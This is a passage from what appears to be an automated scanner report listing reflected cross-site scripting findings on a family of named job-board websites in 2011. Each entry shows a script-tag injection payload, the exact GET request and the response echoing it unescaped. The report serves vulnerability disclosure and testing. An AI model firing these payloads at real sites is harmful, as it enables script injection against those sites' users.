Host: www.planningcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=j7ia85hmb3rcq7tsq3p6afa6j6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108746

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.planningcrossing.com/?131dd"><script>alert(1)</script>32e79ab8991=1">
...[SNIP]...

3.97. http://www.postdoctoralfellowcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.postdoctoralfellowcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26245"><script>alert(1)</script>d6a7726482b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?26245"><script>alert(1)</script>d6a7726482b=1 HTTP/1.1
Host: www.postdoctoralfellowcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qpc1ersq5h9qncti1rg1u4rc74; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102797

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.postdoctoralfellowcrossing.com/?26245"><script>alert(1)</script>d6a7726482b=1">
...[SNIP]...

3.98. http://www.prcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18964"><script>alert(1)</script>b19a0aa290b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?18964"><script>alert(1)</script>b19a0aa290b=1 HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6orf3teb9u7v31k70a8nmlrc21; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120233

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.prcrossing.com/?18964"><script>alert(1)</script>b19a0aa290b=1">
...[SNIP]...

3.99. http://www.procurementcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e82f"><script>alert(1)</script>c07e8b35600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4e82f"><script>alert(1)</script>c07e8b35600=1 HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jse3n83urq36atc979iv0ro2j3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101054

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.procurementcrossing.com/?4e82f"><script>alert(1)</script>c07e8b35600=1">
...[SNIP]...

3.100. http://www.productmanagercrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 103c3"><script>alert(1)</script>96ed62da7e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?103c3"><script>alert(1)</script>96ed62da7e5=1 HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:54 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6b3lghgc54sic7k9tq5ivitvo7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106239

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.productmanagercrossing.com/?103c3"><script>alert(1)</script>96ed62da7e5=1">
...[SNIP]...

3.101. http://www.projectmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3757"><script>alert(1)</script>8ec40ce5596 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f3757"><script>alert(1)</script>8ec40ce5596=1 HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07nflqvoiopran8iob1ldegr20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.projectmanagementcrossing.com/?f3757"><script>alert(1)</script>8ec40ce5596=1">
...[SNIP]...

3.102. http://www.publicinterestcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 446c3"><script>alert(1)</script>0be37d14be6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?446c3"><script>alert(1)</script>0be37d14be6=1 HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tto0bf5j0sbrt1q0tufjnj4kr7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:40 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:40 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104377

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publicinterestcrossing.com/?446c3"><script>alert(1)</script>0be37d14be6=1">
...[SNIP]...

3.103. http://www.publishingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1299"><script>alert(1)</script>63d6d679443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1299"><script>alert(1)</script>63d6d679443=1 HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:28 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=aiscpmnekeoaiek7jnvn73dp42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114371

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.publishingcrossing.com/?d1299"><script>alert(1)</script>63d6d679443=1">
...[SNIP]...

3.104. http://www.purchasingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d28bb"><script>alert(1)</script>b81fd1e5072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d28bb"><script>alert(1)</script>b81fd1e5072=1 HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gmq6hirbm9eue9jjuuskphbjn7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:17 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:17 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.purchasingcrossing.com/?d28bb"><script>alert(1)</script>b81fd1e5072=1">
...[SNIP]...

3.105. http://www.qaqccrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29083"><script>alert(1)</script>3b93251e4b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29083"><script>alert(1)</script>3b93251e4b2=1 HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:26:02 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vsmun0sght8cf4achncb8ubfe5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:26:02 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:26:02 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120308

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.qaqccrossing.com/?29083"><script>alert(1)</script>3b93251e4b2=1">
...[SNIP]...

3.106. http://www.radiocrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6983f"><script>alert(1)</script>7619a9d5f08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6983f"><script>alert(1)</script>7619a9d5f08=1 HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a94a3oatt4kmsoc6ijm0m7a5n1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113039

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.radiocrossing.com/?6983f"><script>alert(1)</script>7619a9d5f08=1">
...[SNIP]...

3.107. http://www.realestateandlandcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9e9"><script>alert(1)</script>126cfe4dd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ef9e9"><script>alert(1)</script>126cfe4dd1e=1 HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bsc5erjjrsq5ueq9uqc5ru32g7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.realestateandlandcrossing.com/?ef9e9"><script>alert(1)</script>126cfe4dd1e=1">
...[SNIP]...

3.108. http://www.recruitingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16149"><script>alert(1)</script>16bf2ef67b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?16149"><script>alert(1)</script>16bf2ef67b6=1 HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:32 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=492145tgm4g6mf4vc155mn93e3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.recruitingcrossing.com/?16149"><script>alert(1)</script>16bf2ef67b6=1">
...[SNIP]...

3.109. http://www.researchingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

